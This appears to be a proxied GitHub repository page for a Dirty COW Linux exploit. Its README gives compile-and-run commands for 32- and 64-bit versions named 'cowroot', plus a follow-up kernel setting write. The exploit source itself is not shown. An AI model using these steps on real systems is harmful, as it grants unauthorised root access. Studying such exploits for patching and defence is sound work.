8000 GitHub - exrienz/DirtyCow: Dirtycow exploit for both 32 and 64-bit
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

exrienz/DirtyCow

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

DirtyCow

Dirtycow exploit for both 32 and 64-bit

Usage Example For 32 Bit

  • $ gcc dc32.c -o cowroot -pthread
  • $ ./cowroot
  • $ echo 0 > /proc/sys/vm/dirty_writeback_centisecs

Usage Example For 64 Bit

  • $ gcc dc64.c -o cowroot -pthread
  • $ ./cowroot
  • $ echo 0 > /proc/sys/vm/dirty_writeback_centisecs

About

Dirtycow exploit for both 32 and 64-bit

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages